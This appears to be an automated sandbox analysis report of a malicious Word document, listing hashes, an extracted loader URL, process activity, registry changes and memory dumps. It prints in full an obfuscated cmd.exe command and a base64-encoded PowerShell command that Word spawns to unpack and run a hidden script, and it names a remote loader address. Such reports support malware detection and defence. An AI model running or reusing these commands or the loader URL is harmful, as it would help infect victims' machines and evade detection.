Analysis
-
max time kernel
126s -
max time network
128s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-05-2021 11:42
Behavioral task
behavioral1
Sample
initial.bin.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
initial.bin.doc
Resource
win10v20210408
General
-
Target
initial.bin.doc
-
Size
106KB
-
MD5
7a618482be272bb1fcb4af69a3f649a3
-
SHA1
8d77bac6b9f0f45dbddce469dbb24a9c6be0ac46
-
SHA256
8e0ddb5abdb6a6b5196e3a4182f3becccfc302c013dce60836896d79f2d7da2a
-
SHA512
3e8e54be84e5406ab22064bd69e0deba21d7fb7ec625c88b91659f38f8db9f6f2dc5d84da3004b7c41e3771074b1d7a70130f4e0c2a869140619c2f83434993d
Malware Config
Extracted
http://finance-advisors-ca.bid/ldr.bin
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1724 1080 Cmd.exe WINWORD.EXE -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 1724 Cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1080 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1788 powershell.exe 1788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1788 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1080 WINWORD.EXE 1080 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 1080 wrote to memory of 1160 1080 WINWORD.EXE splwow64.exe PID 1080 wrote to memory of 1160 1080 WINWORD.EXE splwow64.exe PID 1080 wrote to memory of 1160 1080 WINWORD.EXE splwow64.exe PID 1080 wrote to memory of 1160 1080 WINWORD.EXE splwow64.exe PID 1080 wrote to memory of 1724 1080 WINWORD.EXE Cmd.exe PID 1080 wrote to memory of 1724 1080 WINWORD.EXE Cmd.exe PID 1080 wrote to memory of 1724 1080 WINWORD.EXE Cmd.exe PID 1080 wrote to memory of 1724 1080 WINWORD.EXE Cmd.exe PID 1724 wrote to memory of 1788 1724 Cmd.exe powershell.exe PID 1724 wrote to memory of 1788 1724 Cmd.exe powershell.exe PID 1724 wrote to memory of 1788 1724 Cmd.exe powershell.exe PID 1724 wrote to memory of 1788 1724 Cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\initial.bin.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\Cmd.exeCmd TACAiZWidzJ QlELiFOErRhvNKiaJWsYwW wlJfOqlYPlHp & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AwpZiQoBRUEQPsH%=cRwTOVNzvj&&set %YrMvOFQhX%=p&&set %CTWbrSlIwsfzwt%=o^w&&set %pAjKSKGUdiTzNII%=RdjtQWiQvz&&set %bCbazDZpqJqEP%=!%YrMvOFQhX%!&&set %nobijsdvaoVGBuK%=OdAfEqLtEjRCTT&&set %wauWYPWLOzP%=e^r&&set %rbXUXQCsTtYNK%=!%CTWbrSlIwsfzwt%!&&set %iTXpEXwqEHkkj%=s&&set %RPPUXRswvbTRhTz%=bmiVHFPQ&&set %zjUnavSRR%=he&&set %VKzjjIHdbbC%=ll&&!%bCbazDZpqJqEP%!!%rbXUXQCsTtYNK%!!%wauWYPWLOzP%!!%iTXpEXwqEHkkj%!!%zjUnavSRR%!!%VKzjjIHdbbC%! -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1080-59-0x00000000721B1000-0x00000000721B4000-memory.dmpFilesize
12KB
-
memory/1080-60-0x000000006FC31000-0x000000006FC33000-memory.dmpFilesize
8KB
-
memory/1080-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1160-62-0x0000000000000000-mapping.dmp
-
memory/1160-63-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmpFilesize
8KB
-
memory/1724-64-0x0000000000000000-mapping.dmp
-
memory/1788-65-0x0000000000000000-mapping.dmp
-
memory/1788-66-0x0000000075281000-0x0000000075283000-memory.dmpFilesize
8KB
-
memory/1788-67-0x0000000002210000-0x0000000002211000-memory.dmpFilesize
4KB
-
memory/1788-68-0x0000000004B20000-0x0000000004B21000-memory.dmpFilesize
4KB
-
memory/1788-69-0x00000000025D0000-0x00000000025D1000-memory.dmpFilesize
4KB
-
memory/1788-70-0x0000000004AE0000-0x0000000004AE1000-memory.dmpFilesize
4KB
-
memory/1788-71-0x0000000004AE2000-0x0000000004AE3000-memory.dmpFilesize
4KB
-
memory/1788-72-0x0000000004A50000-0x0000000004A51000-memory.dmpFilesize
4KB
-
memory/1788-75-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/1788-80-0x0000000006170000-0x0000000006171000-memory.dmpFilesize
4KB
-
memory/1788-81-0x0000000006280000-0x0000000006281000-memory.dmpFilesize
4KB
-
memory/1788-88-0x00000000063C0000-0x00000000063C1000-memory.dmpFilesize
4KB
-
memory/1788-89-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1788-90-0x00000000063E0000-0x00000000063E1000-memory.dmpFilesize
4KB